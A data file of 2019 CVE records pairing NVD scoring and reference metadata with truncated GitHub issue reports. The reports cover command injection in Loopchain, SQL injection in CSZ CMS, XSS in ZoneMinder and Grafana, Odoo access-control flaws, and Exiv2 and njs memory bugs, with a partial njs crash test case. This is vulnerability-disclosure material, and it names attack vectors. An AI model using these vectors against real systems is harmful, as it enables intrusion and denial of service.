{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/istio/istio.io/pull/4555" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/istio/istio/issues/15084" }, { "source": "cve@m...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:istio:istio:*:*:*:*:*:*:*:*", "matchCriteriaId": "1518059F-A22C-4DB3-8A46-C565F7024F00", "versionEndExcluding": "1.2.2", "versionEndIncluding": null, "versionStartExcluding":...
[ "476" ]
476
https://github.com/istio/istio/issues/15084
[ "Third Party Advisory" ]
github.com
[ "istio", "istio" ]
**Bug description** I'm trying to implement service to service JWT authentication like something shown in [this](https://github.com/auth0-samples/auth0-api-auth-samples/tree/master/machine-to-machine) repo. While it's working fine with Auth0, I'm having trouble while setting it up with my company's authentication serv...
JWT authentication causing "Epoch 0 terminated with an error" in Envoy
https://api.github.com/repos/istio/istio/issues/15084/comments
6
2019-06-24T05:36:31Z
2019-06-28T21:34:53Z
https://github.com/istio/istio/issues/15084
459,696,678
15,084
445
CVE-2019-12997
2019-06-28T14:15:09.063
In Loopchain through 2.2.1.3, an attacker can escalate privileges from a low-privilege shell by changing the environment (aka injection in the DEFAULT_SCORE_HOST environment variable).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/icon-project/loopchain/issues/231" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:icon:loopchain:*:*:*:*:*:*:*:*", "matchCriteriaId": "EE404E41-7702-4A62-909D-287D1F4D10D4", "versionEndExcluding": null, "versionEndIncluding": "2.2.1.3", "versionStartExclud...
[ "78" ]
78
https://github.com/icon-project/loopchain/issues/231
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "icon-project", "loopchain" ]
## Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attac...
Command Injection (Privilege Escalation)
https://api.github.com/repos/icon-project/loopchain/issues/231/comments
11
2019-06-20T07:49:55Z
2019-06-30T01:34:40Z
https://github.com/icon-project/loopchain/issues/231
458,407,377
231
446
CVE-2018-14867
2019-06-28T18:15:10.410
Incorrect access control in the portal messaging system in Odoo Community 9.0 and 10.0 and Odoo Enterprise 9.0 and 10.0 allows remote attackers to post messages on behalf of customers, and to guess document attribute values, via crafted parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32503" }, { "so...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "284" ]
284
https://github.com/odoo/odoo/issues/32503
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-3 Incorrect access control in the portal messaging system in Odoo Community 9.0 and 10.0 and Odoo Enterprise 9.0 and 10.0 allows remote attackers to post messages on behalf of customers, and to guess document attribute values, via crafted parameters. **Affects**: Odoo 9.0, 10....
[SEC] ODOO-SA-2018-08-07-3 (CVE-2018-14867) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32503/comments
0
2019-04-08T13:37:31Z
2019-04-08T13:37:33Z
https://github.com/odoo/odoo/issues/32503
430,456,556
32,503
447
CVE-2018-14868
2019-06-28T18:15:10.473
Incorrect access control in the Password Encryption module in Odoo Community 9.0 and Odoo Enterprise 9.0 allows authenticated users to change the password of other users without knowing their current password via a crafted RPC call.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32507" }, { "so...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "287" ]
287
https://github.com/odoo/odoo/issues/32507
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-7 Incorrect access control in the Password Encryption module in Odoo Community 9.0 and Odoo Enterprise 9.0 allows authenticated users to change the password of other users without knowing their current password via a crafted RPC call. **Affects**: Odoo 9.0 (Community and Enter...
[SEC] ODOO-SA-2018-08-07-7 (CVE-2018-14868) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32507/comments
0
2019-04-08T13:37:42Z
2019-04-08T13:37:43Z
https://github.com/odoo/odoo/issues/32507
430,456,652
32,507
448
CVE-2018-14885
2019-06-28T18:15:10.520
Incorrect access control in the database manager component in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows a remote attacker to restore a database dump without knowing the super-admin password. An arbitrary password succeeds.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32512" }, { "so...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "284" ]
284
https://github.com/odoo/odoo/issues/32512
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-12 Incorrect access control in the database manager component in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows a remote attacker to restore a database dump without knowing the super-admin password. An arbitrary password succeeds. **Affects**: Odoo 10.0,...
[SEC] ODOO-SA-2018-08-07-12 (CVE-2018-14885) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32512/comments
0
2019-04-08T13:37:55Z
2019-04-08T13:37:57Z
https://github.com/odoo/odoo/issues/32512
430,456,776
32,512
449
CVE-2018-14886
2019-06-28T18:15:10.567
The module-description renderer in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not disable RST's local file inclusion, which allows privileged authenticated users to read local files via a crafted module description.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32513" }, { "so...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "732" ]
732
https://github.com/odoo/odoo/issues/32513
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-13 The module-description renderer in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not disable RST's local file inclusion, which allows privileged authenticated users to read local files via a crafted module description. **Affects**: Odoo 9.0, 10.0...
[SEC] ODOO-SA-2018-08-07-13 (CVE-2018-14886) - The module-description renderer...
https://api.github.com/repos/odoo/odoo/issues/32513/comments
0
2019-04-08T13:37:58Z
2019-04-08T13:38:00Z
https://github.com/odoo/odoo/issues/32513
430,456,802
32,513
450
CVE-2018-14887
2019-06-28T18:15:10.613
Improper Host header sanitization in the dbfilter routing component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows a remote attacker to deny access to the service and to disclose database names via a crafted request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "20" ]
20
https://github.com/odoo/odoo/issues/32511
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-11 Improper Host header sanitization in the dbfilter routing component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows a remote attacker to deny access to the service and to disclose database names via a crafted request. **Affects**: Odoo 9.0, 10...
[SEC] ODOO-SA-2018-08-07-11 (CVE-2018-14887) - Improper Host header sanitizati...
https://api.github.com/repos/odoo/odoo/issues/32511/comments
0
2019-04-08T13:37:52Z
2019-04-08T13:37:55Z
https://github.com/odoo/odoo/issues/32511
430,456,748
32,511
451
CVE-2019-9843
2019-06-28T18:15:15.330
In DiffPlug Spotless before 1.20.0 (library and Maven plugin) and before 3.20.0 (Gradle plugin), the XML parser would resolve external entities over both HTTP and HTTPS and didn't respect the resolveExternalEntities setting. For example, this allows disclosure of file contents to a MITM attacker if a victim performs a ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIA...
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/blob/master/plugin-gradle/CHANGES.md#version-3200---march-11th-2018-javadoc-jcenter" }, { "source": "cve@mitre.org", "tags": [ "Release Notes",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:diffplug:gradle:*:*:*:*:*:spotless:*:*", "matchCriteriaId": "399D30A2-C49C-4F7A-A0F7-BD7B94E6D05C", "versionEndExcluding": "3.20.0", "versionEndIncluding": null, "versionStar...
[ "611" ]
611
https://github.com/diffplug/spotless/issues/358
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "diffplug", "spotless" ]
Original Comment: https://github.com/diffplug/spotless/issues/308#issuecomment-463297964 > ``` > 12:48:55.013 [DEBUG] [sun.net.www.protocol.http.HttpURLConnection] Redirected from http://java.sun.com/xml/ns/javaee/javaee_5.xsd to http://www.oracle.com/webfolder/technetwork/jsc/xml/ns/javaee/javaee_5.xsd > ``` I...
CVE-2019-9843: The XML parser isn't respecting resolveExternalEntities as false
https://api.github.com/repos/diffplug/spotless/issues/358/comments
31
2019-02-13T20:52:58Z
2019-03-18T20:52:07Z
https://github.com/diffplug/spotless/issues/358
409,996,752
358
452
CVE-2019-13032
2019-06-28T23:15:09.343
An issue was discovered in FlightCrew v0.9.2 and earlier. A NULL pointer dereference occurs in GetRelativePathToNcx() or GetRelativePathsToXhtmlDocuments() when a NULL pointer is passed to xc::XMLUri::isValidURI(). This affects third-party software (not Sigil) that uses FlightCrew as a library.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Sigil-Ebook/flightcrew/issues/53" }, { "source": "cve@mitre.org", "tags": null, "url": "https://salvatoresecurity.com/fun-with-fuzzers-or-how-i-discovered-three-v...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flightcrew_project:flightcrew:*:*:*:*:*:sigil:*:*", "matchCriteriaId": "9CD25AA7-C650-4A1E-ABA6-5F189B404CC9", "versionEndExcluding": null, "versionEndIncluding": "0.9.2", "v...
[ "476" ]
476
https://github.com/Sigil-Ebook/flightcrew/issues/53
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Sigil-Ebook", "flightcrew" ]
**Summary** An issue was discovered in FlightCrew v0.9.2 and earlier. A NULL pointer dereference occurs in GetRelativePathToNcx() when a null pointer is passed to xc::XMLUri::isValidURI(). **Details** If the package.opf contains `<item>` elements without "href" attributes, then the variable "href" is set to an emp...
Null Pointer Dereference
https://api.github.com/repos/Sigil-Ebook/flightcrew/issues/53/comments
7
2019-06-26T15:32:15Z
2019-06-30T14:32:31Z
https://github.com/Sigil-Ebook/flightcrew/issues/53
461,041,671
53
453
CVE-2019-13038
2019-06-29T14:15:09.150
mod_auth_mellon through 0.14.2 has an Open Redirect via the login?ReturnTo= substring, as demonstrated by omitting the // after http: in the target URL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Uninett/mod_auth_mellon/issues/35#issuecomment-503974885" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mod_auth_mellon_project:mod_auth_mellon:*:*:*:*:*:apache:*:*", "matchCriteriaId": "8C1F9BDB-BA7E-425B-A94F-6E251666E4BE", "versionEndExcluding": null, "versionEndIncluding": "0.14.2", ...
[ "601" ]
601
https://github.com/Uninett/mod_auth_mellon/issues/35#issuecomment-503974885
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Uninett", "mod_auth_mellon" ]
Hello, In IDP initiated login for Mellon, ReturnTo parameter could be really anything and that gets added as relayState. Once assertion is consumed, mellon redirects to relayState arbitrarily. This leads to Open Redirect security issue. Ideally, redirection code should check if its in same domain. Can this be tracked?...
Open Redirection issue
https://api.github.com/repos/Uninett/mod_auth_mellon/issues/35/comments
15
2015-05-15T18:06:24Z
2019-09-30T07:04:02Z
https://github.com/Uninett/mod_auth_mellon/issues/35
76,805,695
35
454
CVE-2019-13067
2019-06-30T00:15:11.283
njs through 0.3.3, used in NGINX, has a buffer over-read in nxt_utf8_decode in nxt/nxt_utf8.c. This issue occurs after the fix for CVE-2019-12207 is in place.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "E2A12AFA-F1E5-4E07-B86C-A6CC93CD2081", "versionEndExcluding": null, "versionEndIncluding": "0.3.3", "versionStartExcluding": null...
[ "125" ]
125
https://github.com/nginx/njs/issues/183
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
NJS version: ``` changeset: 1011:2fb43ddbce84 tag: tip user: hongzhidao <hongzhidao@gmail.com> date: Mon Jun 10 22:23:56 2019 -0400 summary: Added property getter/setter support in Object.defineProperty(). ``` JS Testcase: ```js (new InternalError(new Object(), RegExp().source....
global-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72
https://api.github.com/repos/nginx/njs/issues/183/comments
5
2019-06-20T12:23:30Z
2019-07-02T14:04:00Z
https://github.com/nginx/njs/issues/183
458,626,122
183
455
CVE-2019-13068
2019-06-30T00:15:11.313
public/app/features/panel/panel_ctrl.ts in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://packetstormsecurity.com/files/171500/Grafana-6.2.4-HTML-Injection.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/grafana/grafana/issues/17718" }, { "source": ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*", "matchCriteriaId": "D02B16B4-30E7-4E47-B14F-C39981C88786", "versionEndExcluding": "6.2.5", "versionEndIncluding": null, "versionStartExcludi...
[ "79" ]
79
https://github.com/grafana/grafana/issues/17718
[ "Third Party Advisory" ]
github.com
[ "grafana", "grafana" ]
You can inject image tags in panel drilldown links (via Title & url fields). There is no script injection as this already sanitized. But for these fields there is no need to have html here. Problem is here: https://github.com/grafana/grafana/blob/master/public/app/features/panel/panel_ctrl.ts#L269 Think...
HTML injection in panel links (drilldown)
https://api.github.com/repos/grafana/grafana/issues/17718/comments
3
2019-06-24T08:15:00Z
2020-04-22T12:30:08Z
https://github.com/grafana/grafana/issues/17718
459,752,656
17,718
456
CVE-2019-13072
2019-06-30T02:15:09.163
Stored XSS in the Filters page (Name field) in ZoneMinder 1.32.3 allows a malicious user to embed and execute JavaScript code in the browser of any user who navigates to this page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2642" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:1.32.3:*:*:*:*:*:*:*", "matchCriteriaId": "E5A2481D-4A45-48A2-B7DE-86C7D161F6EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2642
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
- ZoneMinder version 1.32.3 - Installed from PPA (Ubuntu Xenial) - Ubuntu 16.04 Xenial The 'Filters' page in ZoneMinder 1.32.3 is vulnerable to stored cross site scripting due to improper input sanitation in the 'Name' field. This is the latest version available in the Ubuntu 16.04 PPA. Please see attached scree...
Stored Cross Site Scripting - Filters
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2642/comments
5
2019-06-18T00:07:40Z
2019-12-26T10:04:57Z
https://github.com/ZoneMinder/zoneminder/issues/2642
457,200,985
2,642
457
CVE-2019-13086
2019-06-30T17:15:09.397
core/MY_Security.php in CSZ CMS 1.2.2 before 2019-06-20 has member/login/check SQL injection by sending a crafted HTTP User-Agent header and omitting the csrf_csz parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cszcms:csz_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "2C1D9C9D-FB9B-4452-A8C2-E473488A2634", "versionEndExcluding": null, "versionEndIncluding": "1.2.2", "versionStartExcludin...
[ "89" ]
89
https://github.com/cskaza/cszcms/issues/19
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cskaza", "cszcms" ]
**Title**: Time-based blind SQL injection Vulnerability in cszcms/core/MY_Security.php on cszcms-1.2.2 **Discovered by**: @satuer from ABT Labs **Security**: high (dump database) **Software**: https://github.com/cskaza/cszcms/archive/1.2.2.zip **Description**: There is a high-risk time-based SQL injection vulner...
Bug Report: Time-based blind SQL injection Vulnerability in cszcms/core/MY_Security.php on cszcms-1.2.2
https://api.github.com/repos/cskaza/cszcms/issues/19/comments
4
2019-06-19T14:18:29Z
2019-07-01T09:08:07Z
https://github.com/cskaza/cszcms/issues/19
458,042,220
19
458
CVE-2019-13108
2019-06-30T23:15:09.970
An integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (SIGSEGV) via a crafted PNG image file, because PngImage::readMetadata mishandles a zero value for iccOffset.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/789" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/Exiv2/exiv2/pull/794" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding"...
[ "190" ]
190
https://github.com/Exiv2/exiv2/issues/789
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
There is a bug at [pngimage.cpp:469](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/pngimage.cpp#L469). If `iccOffset == 0`, which happens if `chunkLength == 0`, then Exiv2 crashes with a SIGSEGV. Here is the PoC, which I have tested on master ([55dfdb9](https://github.com/Exiv2/exi...
SIGSEGV in PngImage::readMetadata()
https://api.github.com/repos/Exiv2/exiv2/issues/789/comments
2
2019-04-24T15:24:45Z
2019-07-01T08:58:12Z
https://github.com/Exiv2/exiv2/issues/789
436,761,517
789
459
CVE-2019-13109
2019-06-30T23:15:10.017
An integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (SIGSEGV) via a crafted PNG image file, because PngImage::readMetadata mishandles a chunkLength - iccOffset subtraction.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/790" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/Exiv2/exiv2/pull...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding"...
[ "190" ]
190
https://github.com/Exiv2/exiv2/issues/790
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
This issue is closely related to #789, but the consequences of this bug are different. The calculation of `chunkLength - iccOffset` at [pngimage.cpp:472](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/pngimage.cpp#L472) can have a negative integer overflow which leads to an 8GB memory...
Integer overflow, leading to very large allocation in PngImage::readMetadata()
https://api.github.com/repos/Exiv2/exiv2/issues/790/comments
1
2019-04-24T15:39:42Z
2019-07-01T09:01:35Z
https://github.com/Exiv2/exiv2/issues/790
436,769,374
790
460
CVE-2019-13111
2019-06-30T23:15:10.113
A WebPImage::decodeChunks integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (large heap allocation followed by a very long running loop) via a crafted WEBP image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/Exiv2/exiv2/issues/791" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/Exiv2/exiv2/pull/797" }, { "source": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding"...
[ "190" ]
190
https://github.com/Exiv2/exiv2/issues/791
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "Exiv2", "exiv2" ]
There is a bug at [webpimage.cpp:515](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/webpimage.cpp#L515). If `filesize < io_->tell()` then the subtraction overflows and the bounds check on `size` is ineffective. There is an additional problem in this function, which is that the erro...
Integer overflow, leading to very large allocation in WebPImage::decodeChunks()
https://api.github.com/repos/Exiv2/exiv2/issues/791/comments
1
2019-04-24T16:03:00Z
2019-07-01T09:03:36Z
https://github.com/Exiv2/exiv2/issues/791
436,781,784
791
462
CVE-2019-13112
2019-06-30T23:15:10.160
A PngChunk::parseChunkContent uncontrolled memory allocation in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (crash due to an std::bad_alloc exception) via a crafted PNG image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/845" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/846" }, { "sour...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding"...
[ "770" ]
770
https://github.com/Exiv2/exiv2/issues/845
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
The attached file causes a `std::bad_alloc` exception in `exiv2`. ![issue_845_poc](https://user-images.githubusercontent.com/4358136/57626292-7e38c900-758d-11e9-99aa-85d538eea630.png) The bug is that there is no bounds check on the value of `length` at [pngchunk_int.cpp:669](https://github.com/Exiv2/exiv2/blob/f4...
Out of memory error due to unchecked allocation size in PngChunk::parseChunkContent()
